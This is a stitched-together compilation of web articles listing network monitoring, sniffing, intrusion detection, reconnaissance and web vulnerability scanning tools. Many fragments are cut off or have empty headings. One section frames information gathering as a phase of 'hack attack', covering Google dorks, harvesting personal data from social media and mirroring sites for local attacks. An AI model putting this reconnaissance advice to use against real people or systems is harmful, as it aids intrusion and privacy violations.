Professional Documents
Culture Documents
Tools and Description
Tools and Description
Tools and Description
Cons
Cons
Cons
Website:
https://www.nagios.com/products/nagios-network-analyzer/
Pros
Comprehensive dashboard
Cons
6. Caspa Free
Recommended freeware utility for LAN analysis
Caspa Free is a freeware utility for Ethernet monitoring, troubleshooting and analysis. It offers both
LAN and WLAN near real-time packet analysis, capturing and automated diagnosis with its built-in
functionalities such as superior packet decoding and comprehensive examination of the entire
network.
Caspa Free can easily identify and analyse hundreds of network protocols with its smart custom
reporting, e-mail monitoring, and TCP timing sequence charts for 24/7 network monitoring.
You can also design your own dashboard with required parameters and services to analyse real time
traffic flow; even administrators are free to customise alarm triggers.
Price: Caspa Free is freeware utility and can be downloaded from the links provided below.
Download Links:
http://www.colasoft.com/download/products/capsa_free.php
Website:
http://www.colasoft.com/capsa-free/
Pros
Cons
7. Wireshark
A freeware tool recommended for small and medium enterprise networks
Wireshark is a well-known utility which does not require introduction; almost every network specialist
knows about it. This freeware application is widely used for network monitoring and analysis at a
microscopic level.
This tool offers online or offline deep inspections of various protocols and can be installed on any
standard platform such as Windows, Linux, OS X, Solaris, etc. It can capture data from various
sources including Ethernet, WLAN, WAN and many others. Captured data can be accessed via GUI,
TTY-mode or TShark utility.
Most network instructors use Wireshark in their training programs to capture packets and
demonstrate the packet inspection to provide better understanding of packet flow to their students.
Website:
https://www.Wireshark.org/
Download link:
https://www.Wireshark.org/download.html
Pros
Read/Write support for various capture file formats such as tcpdump, Cisco
Secure IDS iplog, Network General Sniffer, etc.
Cons
Source and Destination Autonomous Systems with the most network flows
Price: To find pricing information for the Professional edition (for 1-9 devices) or Enterprise edition
(unlimited devices), follow this linkhttp://www.caligare.com/netflow/order.php
Or, download a free version at http://www.caligare.com/netflow/free_netflow.php
Website:
http://www.caligare.com/netflow/caligare_flow_inspector.php
Pros
Cons
AirPcap Classic can capture and analyse low-level 802.11b/g wireless traffic.
Website: https://support.riverbed.com/content/support/software/steelcentralnpm/airpcap.html
Pros
Cons
TOP 20
1. Microsoft Network Monitor
Microsoft Network Monitor is a packet analyzer that allows you to capture, view and
analyze network traffic. This tool is handy for troubleshooting network problems and
applications on the network. Main features include support for over 300 public and
Microsoft proprietary protocols, simultaneous capture sessions, a Wireless Monitor
Mode and sniffing of promiscuous mode traffic, amongst others.
When you launch Microsoft Network Monitor, choose which adapter to bind to from
the main window and then click New Capture to initiate a new capture tab. Within
the Capture tab, click Capture Settings to change filter options, adapter options, or
global settings accordingly and then hit Start to initiate the packet capture process.
2. Nagios
Nagios is a powerful network monitoring tool that helps you to ensure that your critical
systems, applications and services are always up and running. It provides features
such as alerting, event handling and reporting. The Nagios Core is the heart of the
application that contains the core monitoring engine and a basic web UI. On top of
the Nagios Core, you are able to implement plugins that will allow you to monitor
services, applications, and metrics, a chosen frontend as well as add-ons for data
visualisation, graphs, load distribution, and MySQL database support, amongst
others.
Tip: If you want to try out Nagios without needing to install and configure it from
scratch, download Nagios XI and enable the free version. Nagios XI is the preconfigured enterprise class version built upon Nagios Core and is backed by a
commercial company that offers support and additional features such as more plugins
and advanced reporting.
Note: The free version of Nagios XI is ideal for smaller environments and will monitor
up to seven nodes.
Once youve installed and configured Nagios, launch the Web UI and begin to
configure host groups and service groups. Once Nagios has had some time to
monitor the status of the specified hosts and services, it can start to paint a picture of
what the health of your systems look like.
3. OpenNMS
OpenNMS is an open source enterprise grade network management application that
offers automated discovery, event and notification management, performance
measurement, and service assurance features. OpenNMS includes a client app for
the iPhone, iPad or iPod Touch for on-the-go access, giving you the ability to view
outages, nodes, alarms and add an interface to monitor.
Once you successfully login to the OpenNMS web UI, use the dashboard to get a
quick snapshot view of any outages, alarms or notifications. You can drill down and
get more information about any of these sections from the Status drop down menu.
The Reports section allows you to generate reports to send by e-mail or download as
a PDF.
4. Advanced IP Scanner
Advanced IP Scanner is a fast and easy to use network scanner that detects any
network devices (including wireless devices such as mobile phones, printers and
WIFI routers) on your network. It allows you to connect to common services such as
HTTP, FTP and shared folders if they are enabled on the remote machine. You are
also able to wake up and shut down remote computers.
The installer allows you to fully install the application on your machine or run the
portable version. When you launch Advanced IP Scanner, start by going to Settings >
Options to select which resources to scan and how fast/accurate you want the results
to be. You can then choose which subnet to scan and proceed with pressing the
Scan button. Once the scan is complete, expand the results to see which resources
you are able to connect to for each discovered device.
5. Capsa Free
Capsa Free is a network analyzer that allows you to monitor network traffic,
troubleshoot network issues and analyze packets. Features include support for over
300 network protocols (including the ability to create and customize protocols), MSN
and Yahoo Messenger filters, email monitor and auto-save, and customizable reports
and dashboards.
When you launch Capsa, choose the adapter you want it to bind to and click Start to
initiate the capture process. Use the tabs in the main window to view the dashboard,
a summary of the traffic statistics, the TCP/UDP conversations, as well as packet
analysis.
6. Fiddler
Fiddler is a web debugging tool that captures HTTP traffic between chosen
computers and the Internet. It allows you to analyze incoming and outgoing data to
monitor and modify requests and responses before they hit the browser. Fiddler gives
you extremely detailed information about HTTP traffic and can be used for testing the
performance of your websites or security testing of your web applications (e.g. Fiddler
can decrypt HTTPS traffic).
When you launch Fiddler, HTTP traffic will start to be captured automatically. To
toggle traffic capturing, hit F12. You can choose which processes you wish to capture
HTTP traffic for by clicking on All Processes in the bottom status bar, or by dragging
the Any Process icon from the top menu bar onto an open application.
7. NetworkMiner
NetworkMiner captures network packets and then parses the data to extract files and
images, helping you to reconstruct events that a user has taken on the network it
can also do this by parsing a pre-captured PCAP file. You can enter keywords which
will be highlighted as network packets are being captured. NetworkMiner is classed
as a Network Forensic Analysis Tool (NFAT) that can obtain information such as
hostname, operating system and open ports from hosts.
In the example above, I set NetworkMiner to capture packets, opened a web browser
and searched for soccer as a keyword on Google Images. The images displayed in
the Images tab are what I saw during my browser session.
When you load NetworkMiner, choose a network adapter to bind to and hit the Start
button to initiate the packet capture process.
8. Pandora FMS
Pandora FMS is a performance monitoring, network monitoring and availability
management tool that keeps an eye on servers, applications and communications. It
has an advanced event correlation system that allows you to create alerts based on
events from different sources and notify administrators before an issue escalates.
When you login to the Pandora FMS Web UI, start by going to the Agent detail and
Services node from the left hand navigation pane. From here, you can configure
monitoring agents and services.
9. Zenoss Core
Zenoss Core is a powerful open source IT monitoring platform that monitors
applications, servers, storage, networking and virtualization to provide availability and
performance statistics. It also has a high performance event handling system and an
advanced notification system.
Once you login to Zenoss Core Web UI for the first time, you are presented with a
two-step wizard that asks you to create user accounts and add your first few devices /
hosts to monitor. You are then taken directly to the Dashboard tab. Use the
Dashboard, Events, Infrastructure, Reports and Advanced tabs to configure Zenoss
Core and review reports and events that need attention.
When you launch PRTG Network Monitor, head straight to the configuration wizard to
get started. This wizard will run you through the main configuration settings required
to get the application up and running, including the adding of servers to monitors and
which sensors to use.
When you launch The Dude, you first choose to connect to a local or remote network
and specify credentials accordingly. Click Settings to configure options for SNMP,
Polling, Syslog and Reports.
12 Splunk
Splunk is a data collection and analysis platform that allows you to monitor, gather
and analyze data from different sources on your network (e.g. event logs, devices,
services, TCP/UDP traffic, etc). You can set up alerts to notify you when something is
wrong or use Splunks extensive search, reporting and dashboard features to make
the most of the collected data. Splunk also allows you to install Apps to extend
system functionality.
Note: When you first download and install Splunk, it automatically installs the
Enterprise version for you to trial for 60 days before switching to the Free version. To
switch to the Free version straight away, go to Manager > Licensing.
When you login to the Splunk web UI for the first time, add a data source and
configure your indexes to get started. Once you do this you can then create reports,
build dashboards, and search and analyze data.
When you execute the application, go to Tools > Preferences to configure Scanning
and Port options, then go to Tools > Fetchers to choose what information to gather
from each scanned IP address.
14 Icinga 2
Icigna is a Linux based fully open source monitoring application which checks the
availability of network resources and immediately notifies users when something goes
down. Icigna provides business intelligence data for in depth analysis and a powerful
command line interface.
When you first launch the Icigna web UI, you are prompted for credentials. Once
youve authenticated, use the navigation menu on the left hand side to manage the
configuration of hosts, view the dashboard, reports, see a history of events, and
more.
When you launch Total Network Monitor, go to Tools > Scan Wizard to have the
wizard scan a specified network range automatically and assign the discovered hosts
to a group. Alternatively, create a new group manually to start adding devices/hosts
individually.
16. NetXMS
Once you login to NetXMS you need to first go to the Server Configuration window
to change a few settings that are dependent on your network requirements (e.g.
changing the number of data collection handlers or enabling network discovery). You
can then run the Network Discovery option for NetXMS to automatically discover
devices on your network, or add new nodes by right clicking on Infrastructure
Services and selecting Tools > Create Node.
17. Xymon
Xymon is a web-based system designed to run on Unix-based systems that
allows you to dive deep into the configuration, performance and real-time statistics of
your networking environment. It offers monitoring capabilities with historical data,
reporting and performance graphs.
Once youve installed Xymon, the first place you need to go is the hosts.cfg file to add
the hosts that you are going to monitor. Here, you add information such as the host IP
address, the network services to be monitored, what URLs to check, and so on.
When you launch the Xymon Web UI, the main page lists the systems and services
being monitored by Xymon. Clicking on each system or service allows you to bring up
status information about a particular host and then drill down to view specific
information such as CPU utilization, memory consumption, RAID status, etc.
18. WirelessNetView
WirelessNetView is a lightweight utility (available as a standalone executable or
installation package) that monitors the activity of reachable wireless networks and
displays information related to them, such as SSID, Signal Quality, MAC Address,
Channel Number, Cipher Algorithm, etc.
Once you launch Wi-Fi Inspector and choose an adapter, a list of available Wi-Fi
connections is displayed in the Networks pane. Details related to your current Wi-Fi
connection are displayed in the top right hand corner. Everything pretty much
happens from the top ribbon bar you can run a test, change the layout, edit settings,
refresh connections, etc.
20. WireShark
This list wouldnt be complete without the ever popular WireShark. WireShark is an
interactive network protocol analyzer and capture utility. It provides for in-depth
inspection of hundreds of protocols and runs on multiple platforms.
When you launch Wireshark, choose which interface you want to bind to and click the
green shark fin icon to get going. Packets will immediately start to be captured. Once
youve collected what you need, you can export the data to a file for analysis in
another application or use the in-built filter to drill down and analyze the captured
packets at a deeper level from within Wireshark itself.
Are there any free tools not on this list that youve found useful and would like to
share with the community? Then leave us a comment below and let us know!
And theres more! If youre a sys admin thats been faced with malware
infection, cracked passwords, defaced website, compromised DNS,
licensing violations, stolen hardware and other issues which can cause
cardiac arrest? We have what you need! Download this free e-book: First
Aid Kit for Admins today!
SNIFFING TOOLS:
Top 10 Data/Packet Sniffing and Analyzer
Tools for Hackers
1: Wireshark
Wireshark (known as Ethereal until a trademark dispute in Summer 2006) is a fantastic
open source network protocol analyzer for Unix and Windows. It allows you to examine
data from a live network or from a capture file on disk. You can interactively browse the
capture data, delving down into just the level of packet detail you need. Wireshark has
several powerful features, including a rich display filter language and the ability to view
the reconstructed stream of a TCP session. It also supports hundreds of protocols and
media types. A tcpdump-like console version named tethereal is included. One word of
caution is that Ethereal has suffered from dozens of remotely exploitable security holes,
2: Tcpdump
Tcpdump is the IP sniffer we all used before Ethereal (Wireshark) came on the scene,
and many of us continue to use it frequently. It may not have the bells and whistles
(such as a pretty GUI or parsing logic for hundreds of application protocols) that
Wireshark has, but it does the job well and with fewer security holes. It also requires
fewer system resources. While it doesnt receive new features often, it is actively
maintained to fix bugs and portability problems. It is great for tracking down network
problems or monitoring activity. There is a separate Windows port named WinDump.
TCPDump is the source of the Libpcap/WinPcap packet capture library, which is used
by Nmap among many other tools.
4: Kismet
Kismet is an console (ncurses) based 802.11 layer2 wireless network detector, sniffer,
and intrusion detection system. It identifies networks by passively sniffing (as opposed
to more active tools such as NetStumbler), and can even decloak hidden (nonbeaconing) networks if they are in use. It can automatically detect network IP blocks by
sniffing TCP, UDP, ARP, and DHCP packets, log traffic in Wireshark/TCPDump
compatible format, and even plot detected networks and estimated ranges on
downloaded maps. As you might expect, this tool is commonly used for wardriving. Oh,
and also warwalking, warflying, and warskating,
5: Dsniff
6: NetStumbler
Netstumbler is the best known Windows tool for finding open wireless access points
(wardriving). They also distribute a WinCE version for PDAs and such
named Ministumbler. The tool is currently free but Windows-only and no source code is
provided. It uses a more active approach to finding WAPs than passive sniffers such
as Kismet or KisMAC.
7: Ettercap
Ettercap is a terminal-based network sniffer/interceptor/logger for ethernet LANs. It
supports active and passive dissection of many protocols (even ciphered ones, like ssh
and https). Data injection in an established connection and filtering on the fly is also
possible, keeping the connection synchronized. Many sniffing modes were implemented
to give you a powerful and complete sniffing suite. Plugins are supported. It has the
ability to check whether you are in a switched LAN or not, and to use OS fingerprints
(active or passive) to let you know the geometry of the LAN.
8: Ngrep
ngrep strives to provide most of GNU greps common features, applying them to the
network layer. ngrep is a pcap-aware tool that will allow you to specify extended regular
or hexadecimal expressions to match against data payloads of packets. It currently
recognizes TCP, UDP and ICMP across Ethernet, PPP, SLIP, FDDI, Token Ring and null
interfaces, and understands bpf filter logic in the same fashion as more common packet
sniffing tools, such as tcpdump and snoop.
9: Ntop
Ntop shows network usage in a way similar to what top does for processes. In
interactive mode, it displays the network status on the users terminal. In Web mode, it
acts as a Web server, creating an HTML dump of the network status. It sports a
NetFlow/sFlow emitter/collector, an HTTP-based client interface for creating ntop-centric
monitoring applications, and RRD for persistently storing traffic statistics.
10: EtherApe
EtherApe is a graphical network monitor for Unix modeled after etherman.
Featuring link layer, IP and TCP modes, EtherApe displays network activity graphically
with a color coded protocols display. Hosts and links change in size with traffic. It
supports Ethernet, FDDI, Token Ring, ISDN, PPP and SLIP devices. It can filter traffic to
be shown, and can read traffic from a file as well as live from the network.
3.SNORTING:
4.IDS and IPS:
If an IPS is a control tool, then an IDS is a visibility tool. Intrusion Detection Systems sit off to
the side of the network, monitoring traffic at many different points, and provide visibility into the
security posture of the network
ber
January
13,
2014
Whether you need to monitor hosts or the networks connecting them to identify the
latest threats, there are some great open source intrusion detection (IDS) tools available
to you.
I won't bore you with how long I've been doing network security, but I've been doing
packet analysis before any of these tools even existed. Tcpdump and me, good buddies.
I've deployed and managed virtually every commercial and open source IDS tool out
there. In fact my ardor for packets landed me a job analyzing network traffic for Fortune
50 companies while working at a major MSSP I'm sure everyone has heard of. Enough
about me, let's get to it.
Network IDS - These tools operate by inspecting traffic that occurs between hosts.
If you aren't already running network IDS, you should be. There are two types of
Network IDS:Signature detection and Anomaly Detection.
In a signature-based IDS, there are rules or patterns of known malicious traffic that it is
looking for. Once a match to a signature is found it generates an alert. These alerts can
turn up issues such as malware, scanning activity, attacks against servers and much
more.
With anomaly-based IDS, the payload of the traffic is far less important than the activity
that generated it. An anomaly-based IDS tool relies on baselines rather than signatures.
It will look for unusual activity that deviates from statistical averages of previous
activities or activity that has been previously unseen. Perhaps a server is sending out
more HTTP activity than usual or a new host has been seen inside your DMZ.
Both are typically deployed in the same manner, though one could make the case you
could easily (and people have) create an anomaly-based IDS on externally-collected
netflow data or similar traffic information.
Looking for attacks isn't the only use case for IDS, you can also use it to find violations
of network policy. IDS will tell you an employee was using Gtalk, uploading to Box, or
spending all their time watching Hulu instead of working.
Snort
Ah, the venerable piggy that loves packets. I'm sure everyone remembers 1998 as the
year a version of Windows came out but it was also the year that Martin Roesch first
released Snort. Though then it really wasn't a true IDS, its destiny had been written.
Since then it has become the de-facto standard for IDS and eventually IPS (thanks to
community effort!). It's important to note that Snort has no real GUI or easy to use
administrative console. Lots of other open source tools have been created to help out,
notably Snorby and others like Base and Squil.
Suricata
What's the only reason for not running Snort? If you're using Suricata instead. Though
Suricata's architecture is different than Snort it behaves the same way as Snort and can
use the same signatures. What's great about Suricata is what else it's capable of over
Snort. It does so much more that it probably deserves a dedicated post of it's own. Let's
run down a few of them:
Multi-Threaded - Snort runs with a single thread meaning it can only use one
CPU(core) at a time. Suricata can run many threads so it can take advantage of all the
cpu/cores you have available. There has been much contention on whether this is
File Extraction - Someone downloading malware? You can capture it right from
Logging more than packets - Suricata can grab and log things like TLS/SSL certs,
HTTP requests,DNS requests
So much more...
With so many features and capabilities it's no wonder it's the default network IDS inside
USM now.
Bro
Bro, or sometimes referred to as Bro-IDS is a bit different than Snort and Suricata. In a
way Bro is both a signature and anomaly-based IDS. Its analysis engine will convert
traffic captured into a series of events. An event could be a user logon to FTP, a
connection to a website or practically anything. The power of the system is what
comes after the event engine and that's the Policy Script Interpreter. This policy engine
has it's own language ( Bro-Script ) and it can do some very powerful and versatile
tasks.
If you're an analyst and you've wondered "How can I automate some of my work?" then
this is the tool you've been looking for. Want to download files seen on the wire, submit
them for malware analysis,notify you if a problem is found then blacklist the source and
shutdown the user's computer who downloaded it? Want to track the usage patterns of
a user after they've contacted an IP from a reputation database?
If you're not an analyst than this tool will have a challenging learning curve. Since it was
developed as a research tool it didn't initially focus on things like GUIs, usability, and
ease of installation. While it does many cool things out of the box many of those things
aren't immediately actionable and may be difficult to interpret.
Summary:
Complicated to set up
Kismet
Just as Snort became the standard for network intrusion, Kismet is the baseline for
wireless IDS. Wireless IDS deals less with the packet payload but more with strange
things happening inside the wireless protocols(mostly 802.11) and functions. WIDS will
find unauthorized Access Points (Rogue AP Detection), perhaps one created by an
employee accidentally(yes, I've seen that) that opens a network up. Perhaps someone
has stood up an AP with the same name as your corporate network to perform MITM
attacks? Kismet will find all of these. Kismet runs on a variety of platforms, even
Android. Besides IDS Kismet can also be used for more utilitarian things like wireless site
surveys or fun activities like WarDriving.
Host IDS - Host based IDS systems, or HIDS, work by monitoring activity that is
occurring internally on a host.
HIDS look for unusual or nefarious activity by examining logs created by the operating
system, looking for changes made to key system files, tracking installed software, and
sometimes examining the network connections a host makes. The first HIDS systems
were rather rudimentary, usually just creating md5 hashes of files on a recurring basis
and looking for discrepancies (File Integrity Monitoring). Since then HIDS have grown
far more complex and perform a variety of useful security functions. Also if you need to
become compliant to one of the many standards (PCI, ISO, etc..) then HIDS is
compulsory.
OSSEC
In the realm of full featured Open Source HIDS tools, there is OSSEC and not much else.
Go ahead and google away, I'll wait. The great news is OSSEC is very good at what it
does and it is rather extensible. OSSEC will run on almost any major operating system
and uses a Client/Server based architecture which is very important in a HIDS system.
Since a HIDS could be potentially compromised at the same time the OS is, it's very
important that security and forensic information leave the host and be stored elsewhere
as soon as possible to avoid any kind of tampering or obfuscation that would prevent
detection.
OSSEC's architecture design incorporates this strategy by delivering alerts and logs to a
centralized server where analysis and notification can occur even if the host system is
taken offline or compromised. Another advantage of this architecture is the ability
to centrally manage agents from a single server. Since deployments can range from
one to thousands of installations, the ability to make changes en masse via a central
server is critical for an administrator's sanity.
When discussing OSSEC and other HIDS there is often trepidation in installing an agent
or software on to critical servers. It should be noted that the installation of OSSEC is
extremely light, the installer is under 1MB, and that the majority of analysis actually
occurs on the server which means very little cpu is consumed by OSSEC on the host.
OSSEC also has the ability to send OS logs to the server for analysis and storage, which
is particularly helpful on Windows machines that have no native and cross-platform
logging mechanisms.
Summary:
Samhain
In comparison to OSSEC, Samhain is the best competition. But it's very much the case
of same but different when making the comparison. Samhain has the same
client/server architecture but it's not beholden to it like OSSEC is. The agent itself has a
variety of output methods, one being a central server but others like Syslog, Email, and
RDBMS which are greatly appreciated.
Another important difference is where the analysis occurs. Unlike OSSEC the processing
occurs on the client itself. While this does give an advantage in terms of processing
speed it could have potential impact on your servers. However, it does put those CPU
cycles to good use as it has a much stronger emphasis on FIM.
Summary:
Harder to install
OpenDLP
OpenDLP isn't really a HIDS system but it's functionality makes it worth a mention here.
This tool has one goal and that's DLP or Data Loss Prevention. It will scan data while
it's "at-rest" looking for pieces of data like credit cards or SSNs and can be extended
with regular expressions to find data that is sensitive to your organization. OpenDLP will
look for this data on file systems or even inside databases on both Windows and
Linux. It can also perform these scans via an installable agent or without any software
installation.
FIM Only
There are quite a few FIM tools that get categorized with HIDS. Some are actively
developed and others haven't been updated in years. Since these tools only perform
one function I won't elaborate much more. A few of these are AIDE, OS
Tripwire and AFick.
Security Onion
If you're interested in trying out some or all of the open source IDS tools from this post
you could save some time and check out Security Onion. It's a distribution of Ubuntu
with everything pre-installed.
Security Onion
Security Onion is an Ubuntu-based Linux distribution for network monitoring and
intrusion detection. The image can be distributed as sensors within the network to
monitor multiple VLANs and subnets, and works well in VMware and virtual
environments. This configuration can be used as an IDS only. It isn't currently
supported to be run as an IPS. However, there is the option to run this both as a
network and host intrusion-detection deployment, and to utilize services such as Squil,
Bro IDS and OSSEC to perform the IDS functions of the service. The wiki and
documentation for the site and software is terrific, and defects and bugs are recorded
and reviewed. As great as Security Onion is, however, it still needs more assistance
with development, which will most likely happen in time.
OSSEC
OSSEC is an open source host intrusion-detection system (HIDS) that does more than
detect intrusions. Like most open source IDS offerings, there are multiple additional
modules that can be used with the core functionality of IDS. In addition to network
intrusion-detection, the OSSEC client has the ability to perform file integrity
monitoring and rootkit detection with real-time alerts, all of which are centrally
managed with the ability to create different policies, depending on a company's needs.
The OSSEC client runs locally on most operating systems, including Linux versions,
Mac OSX and Windows. It also offers commercial support via Trend Micro's Global
Support Team. This is a very mature offering.
PRO+
Content
Find more PRO+ content and other member only offers, here.
E-Handbook
E-Zine
Insider Edition: Beyond 'next gen': Putting a 21st century security strategy in place
E-Handbook
OpenWIPS-NG
OpenWIPS-NG is a free wireless IDS/IPS that relies on a server, sensors and
interfaces. It runs on commodity hardware. Created by the author of Aircrack-NG, this
system uses many of the functions and services already built into Aircrack-NG for
scanning, detection and intrusion prevention. OpenWIPS-NG is modular and allows
an administrator to download plug-ins for additional features. The documentation isn't
as detailed as some systems', but it allows for companies to perform WIPS on a tight
budget.
Suricata
Out of all the IDS/IPS systems that are currently available, Suricata competes most
directly with Snort. This system has an architecture that is similar to Snort's, relies on
signatures like Snort, and can even use the VRT Snort rules and the same Emerging
Threat rule set that Snort itself uses. Being newer than Snort, Suricata has ways to
catch up to in this area. If Snort isn't an option in your organization, this is the closest
free tool available to run on an enterprise network.
Bro IDS
Bro IDS is similar to Security Onion in that it uses more than IDS rules to determine
where attacks are coming from. Bro IDS uses a combination of tools. At one point it
used Snort-based signatures converted into Bro signatures. This is no longer the case,
and it is now possible to write custom signatures for the Bro IDS. This system is
highly documented and has been around for over 15 years.
Snort has definitely made its presence known by the influence it has over most of the
IDS/IPS market, including freeware and open source IDS/IPS. The systems reviewed
here all perform IDS/IPS a little differently, but are suitable, free alternatives that
companies on a budget can utilize to more fully protect their network.
ids
remove filters
(#5, 2)
This network intrusion detection and prevention system excels at traffic analysis and
packet logging on IP networks. Through protocol analysis, content searching, and
various pre-processors, Snort detects thousands of worms, vulnerability exploit
attempts, port scans, and other suspicious behavior. Snort uses a flexible rule-based
language to describe traffic that it should collect or pass, and a modular detection
engine. Also check out the free Basic Analysis and Security Engine (BASE), a web
interface for analyzing Snort alerts.
While Snort itself is free and open source, parent company SourceFire offers their
VRT-certified rules for $499 per sensor per year and a complementary product line of
software and appliances with more enterprise-level features. Sourcefire also offers a
free 30-day delayed feed. Read 2 reviews.
Latest release: version 2.9.7.5 on July 23, 2015 (10 months, 1 week ago).
ids
(1) OSSEC
OSSEC HIDS performs log analysis, integrity checking, rootkit detection, time-based
alerting and active response. In addition to its IDS functionality, it is commonly used
as a SEM/SIM solution. Because of its powerful log analysis engine, ISPs,
universities and data centers are running OSSEC HIDS to monitor and analyze their
firewalls, IDSs, web servers and authentication logs. Read 2 reviews.
Latest release: version 2.8.2 on June 10, 2015 (11 months, 2 weeks ago).
ids
(2) OSSIM
(#48, new!)
Alienvault OSSIM stands for Open Source Security Information Management. Its
goal is to provide a comprehensive compilation of tools which, when working
together, grant network/security administrators with a detailed view over each and
every aspect of networks, hosts, physical access devices, and servers. OSSIM
incorporates several other tools, including Nagios and OSSEC HIDS. Read 2 reviews.
Latest release: version 5.0.3 on June 2, 2015 (11 months, 4 weeks ago).
ids
(1) Sguil
(#86, 1)
Sguil (pronounced sgweel) is built by network security analysts for network security
analysts. Sguil's main component is an intuitive GUI that provides access to realtime
events, session data, and raw packet captures. Sguil facilitates the practice of Network
Security Monitoring and event driven analysis. Read 1 review.
Latest release: version 0.9.0 on March 28, 2014 (2 years, 1 month ago).
ids
(1) ArcSight
ids
(1) Honeyd
(#124, 44)
Honeyd is a small daemon that creates virtual hosts on a network. The hosts can be
configured to run arbitrary services, and their TCP personality can be adapted so that
they appear to be running certain versions of operating systems. Honeyd enables a
single host to claim multiple addresses on a LAN for network simulation. It is
possible to ping the virtual machines, or to traceroute them. Any type of service on the
virtual machine can be simulated according to a simple configuration file. It is also
possible to proxy services to another machine rather than simulating them. It has
many library dependencies, which can make compiling/installing Honeyd
difficult. Read 2 reviews.
Latest release: version 1.5c on May 27, 2007 (9 years ago).
INFORMATION GATHERING
TOOLS:
There are more that 20 + tools that i use for Information gathering as its the most important phase of any
hack attack and its always good to gather as much as information you can gather. Because very less
people are aware that information that we have collected in this phase is used to create dictionary files for
brute force attacks and other social engineering attacks. So of my favourite Information gathering tools
are :
a. Google (best for passive information gathering) : Use Google dorks at their best. You can get
1000s of such dorks at exploit-db.com website.
b. Facebook, Google +, Linked In and other social networking sites are great places to gather
personal information about anyone.
c. Nothing beats NETCRAFT if you have to do passive information gathering of WEB SERVERS.
d. Whois is always informative as still considered as best tool for passive information gathering about
websites.
e. HTTrack and Webripper are also good tools to make offline copy of any website for executing local
attacks which we cant do on servers as nowadays most servers uses exhaustive security protocols.
f. Wireshark : If you are taking about anything related to network sniffing or capturing network data, not a
single tool can beat Wireshark. Its really a Wireless shark which eats everything :P.
g. Few other favourite tools for information gathering are DNSDICT, DNSRECON, DNSENUM.
h. Spokeo : People Search Engine, where you can search people by Name, Email and Phone Number.
Try Spokeo:
Find anybodys photos, videos and blogs instantly. You may be surprised!
There are lot many tools that you guys can use for information gathering.
Nmap
http://nmap.org/
P0f
http://lcamtuf.coredump.cx/p0f.shtml
MingSweeper
http://www.hoobie.net/mingsweeper/
THC Amap
http://freeworld.thc.org/thc-amap/
Angry IP Scanner
http://www.angryziber.com/w/Download
Unicornscan
http://sourceforge.net/projects/osace
Samspade
http://samspade.org/
Strobe
http://packetstormsecurity.org/UNIX/scanners/
Netcat
http://netcat.sourceforge.net/
Superscan
http://www.foundstone.com/us/resources/proddesc/superscan.htm
SQL Scan
http://www.foundstone.com/us/resources/proddesc/sqlscan.htm
ipEye
http://www.ntsecurity.nu/toolbox/ipeye/
Nuke Nabber
http://packetstormsecurity.org/MSDOS/audit/nn29b.exe
Snort
http://www.snort.org
Trout
http://www.foundstone.com/us/resources/proddesc/trout.htm
Hping2
http://www.hping.org/
XProbe2
http://www.sys-security.com/index.php?page=xprobe
EtherPeek (now known OmniPeek)
http://www.wildpackets.com/
This is not the complete list and you are welcome to contribute to this list. Any new
information gathering tools are welcome, please leave at comment.
Read more: Top Information Gathering Tools For Hackers Hacking Geeks
VIDEO/WEBCAST
Live Webcast 7/12/16: Automating the Identity Lifecycle with Okta Provisioning
WHITE PAPER
A Business Case for Funding Your Insider Threat
SEE ALL
Go
Once the scan is complete youll find a separate report for each
Windows machine scanned with an overall security classification
and categorized details of the results. For each item you can click
a link to read details on what was scanned and how to correct it,
if a vulnerability were found, and for some you can click to see
more result details. The reports are automatically saved for future
reference, but you can also print and/or copy the report to the
clipboard.
Although free and user-friendly, keep in mind that MBSA lacks
scanning of advanced Windows settings, drivers, non-Microsoft
software, and network-specific vulnerabilities. Nevertheless, its a
great tool to help you find and minimize general security risks.
4. Nexpose Community Edition
6. Qualys FreeScan
Grabber
Grabber is a nice web application scanner which can detect many security vulnerabilities in web
applications. It performs scans and tells where the vulnerability exists. It can detect the following
vulnerabilities:
SQL injection
Ajax testing
File inclusion
It is not fast as compared to other security scanners, but it is simple and portable. This should be
used only to test small web applications because it takes too much time to scan large applications.
This tool does not offer any GUI interface. It also cannot create any PDF report. This tool was
designed to be simple and for personal use. You can try this tool just for personal use. If you are
thinking of it for professional use, I will never recommend it.
This tool was developed in Python. And an executable version is also available if you want. Source
code is available, so you can modify it according your needs. The main script is grabber.py, which
once executed calls other modules like sql.py, xss.py or others.
Download it here: http://rgaucher.info/beta/grabber/
Source code on Github: https://github.com/neuroo/grabber
Vega
Vega is another free open source web vulnerability scanner and testing platform. With this tool, you
can perform security testing of a web application. This tool is written in Java and offers a GUI based
environment. It is available for OS X, Linux and Windows.
It can be used to find SQL injection, header injection, directory listing, shell injection, cross site
scripting, file inclusion and other web application vulnerabilities. This tool can also be extended using
a powerful API written in JavaScript.
While working with the tool, it lets you set a few preferences like total number of path descendants,
number of child paths of a node, depth and maximum number of request per second. You can use
Vega Scanner, Vega Proxy, Proxy Scanner and also Scanner with credentials. If you need help, you
can find resources in the documentation section:
Documentation: https://subgraph.com/vega/documentation/index.en.html
Download Vega: https://subgraph.com/vega/
ETHICAL HACKING TRAINING
Intercepting Proxy
Automatic Scanner
Fuzzer
Plug-n-hack support
Authentication support
You can either use this tool as a scanner by inputting the URL to perform scanning, or you can use
this tool as an intercepting proxy to manually perform tests on specific pages.
Download ZAP : http://code.google.com/p/zaproxy/
Wapiti
Wapiti is also a nice web vulnerability scanner which lets you audit the security of your web
applications. It performs black-box testing by scanning web pages and injecting data. It tries to inject
payloads and see if a script is vulnerable. It supports both GET and POSTHTTP attacks and detects
multiple vulnerabilities.
File Disclosure
File inclusion
CRLF Injection
Wapiti is a command-line application. So, it may not be easy for beginners. But for experts, it will
perform well. For using this tool, you need to learn lots of commands which can be found in official
documentation.
Download Wapiti with source code: http://wapiti.sourceforge.net/
W3af
W3af is a popular web application attack and audit framework. This framework aims to provide a
better web application penetration testing platform. It is developed using Python. By using this tool,
you will be able to identify more than 200 kinds of web application vulnerabilities including SQL
injection, Cross-Site Scripting and many others.
It comes with a graphical and console interface. You can use it easily by using its easy to understand
interface.
If you are using it with Graphical Interface, I do not think that you are going to face any problem with
the tool. You only need to select the options and then start the scanner. If a website needs
authentication, you can also use authentication modules to scan the session-protected pages.
We have already covered this tool in detail in our previous W3af walkthrough series. You can read
those articles to know more about this tool.
You can access source code at the Github repository:https://github.com/andresriancho/w3af/
Download it from the official website: http://w3af.org/
WebScarab
WebScarab is a Java-based security framework for analyzing web applications using HTTP or
HTTPS protocol. With available plugins, you can extend the functionality of the tool. This tool works
as an intercepting proxy. So, you can review the request and response coming to your browser and
